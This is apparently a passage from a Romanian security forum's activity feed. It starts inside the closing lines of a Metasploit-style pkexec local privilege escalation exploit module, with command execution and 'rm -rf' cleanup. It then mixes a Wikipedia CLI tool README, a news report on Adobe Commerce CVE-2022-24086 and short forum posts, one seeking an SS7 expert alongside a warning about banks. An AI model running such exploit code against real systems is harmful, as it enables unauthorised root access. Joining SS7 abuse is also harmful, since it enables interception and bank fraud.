#{random_string_2}" print_warning("Verify cleanup of #{working_dir}") vprint_status("Running #{cmd}") output = cmd_exec(cmd) # Return to the old working directory before we delete working_directory cd(@old_wd) cmd_exec("rm -rf #{working_dir}") vprint_status(output) unless output.empty? # Return proper value if we are using exploit-as-a-check if check return false if output.include?('pkexec --version') return true end end def exploit run_exploit(false) end end Source
-
- 1
-
- qualys security advisory
- dhiraj mishra
-
(and 2 more)
Tagged with:
-
WIK wik is command based wiki. It let you search for any wikipedia up to date article on one query to your terminal. Requirements Python3 beautifulsoup4 Installation Linux From Source sudo pip3 install beautifulsoup4 flit_core git clone https://github.com/yashsinghcodes/wik.git cd wik sudo pip3 install . PYPI sudo pip3 install wik Windows From Source pip install beautifulsoup4 flit_core git clone https://github.com/yashsinghcodes/wik.git cd wik pip install . PYPI pip install wik Options Using wik is acutally really simple. usage: wik [-h] [-s SEARCH] [-i INFO] [-q QUICK] optional arguments: -h, --help show this help message and exit -s SEARCH, --search SEARCH Search any topic -i INFO, --info INFO Get info on any topic(Use correct name) -q QUICK, --quick QUICK Get the summary on any topic Example $ wik -q Linux Contribution You can contribute to the project by opening a issue if you face any or making a pull requests, if you think you can fix somthing or make improvment on the code. If you have some ideas related to the project you can contact me. Want to work with me? This is the task list if you think you can implement any please make a pull request. Download: wik-main.zip or git clone https://github.com/yashsinghcodes/wik.git Source
-
Kamarazi, poti da T/C, merći
-
Salut, stie cineva cum se numeste sau unde pot gasi detergent pentru uniformele de politie? PS: nu miros a Ariel.
-
For Reverse engineering It's your decision. by the way...
-
Back-up before reset
-
Adobe says the vulnerability is being used in attacks targeting Adobe Commerce users. Adobe has released an emergency patch to tackle a critical bug that is being exploited in the wild. On February 13, the tech giant said that the vulnerability impacts Adobe Commerce and Magento Open Source, and according to the firm's threat data, the security flaw is being weaponized "in very limited attacks targeting Adobe Commerce merchants." Tracked as CVE-2022-24086, the vulnerability has been issued a CVSS severity score of 9.8 out of 10, the maximum severity rating possible. The vulnerability is an improper input validation issue, described by the Common Weakness Enumeration (CWE) category system as a bug that occurs when a "product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly." CVE-2022-24086 does not require any administrator privileges to trigger. Adobe says the critical, pre-auth bug can be exploited in order to execute arbitrary code. As the vulnerability is severe enough to warrant an emergency patch, the company has not released any technical details, which gives customers time to accept fixes and mitigates further risks of exploit. The bug impacts Adobe Commerce (2.3.3-p1-2.3.7-p2) and Magento Open Source (2.4.0-2.4.3-p1), as well as earlier versions. Adobe's patches can be downloaded and manually applied here. Earlier this month, Adobe issued security updates for products including Premiere Rush, Illustrator, and Creative Cloud. The patch round tackled vulnerabilities leading to arbitrary code execution, denial-of-service (DoS), and privilege escalation, among other issues. Last week, Apple released a fix in iOS 15.3.1 to squash a vulnerability in Apple's Safari browser that could be exploited for arbitrary code execution. In February's Patch Tuesday, Microsoft resolved 48 vulnerabilities including one publicly-known zero-day security flaw. Via zdnet.com
-
Caut pe cineva care cunoaste bine protocolul ss7
Kev replied to iamlegend000's topic in Locuri de munca
Au "pi2de" in phone shop. on: categorie gresita PS: grije cu bancile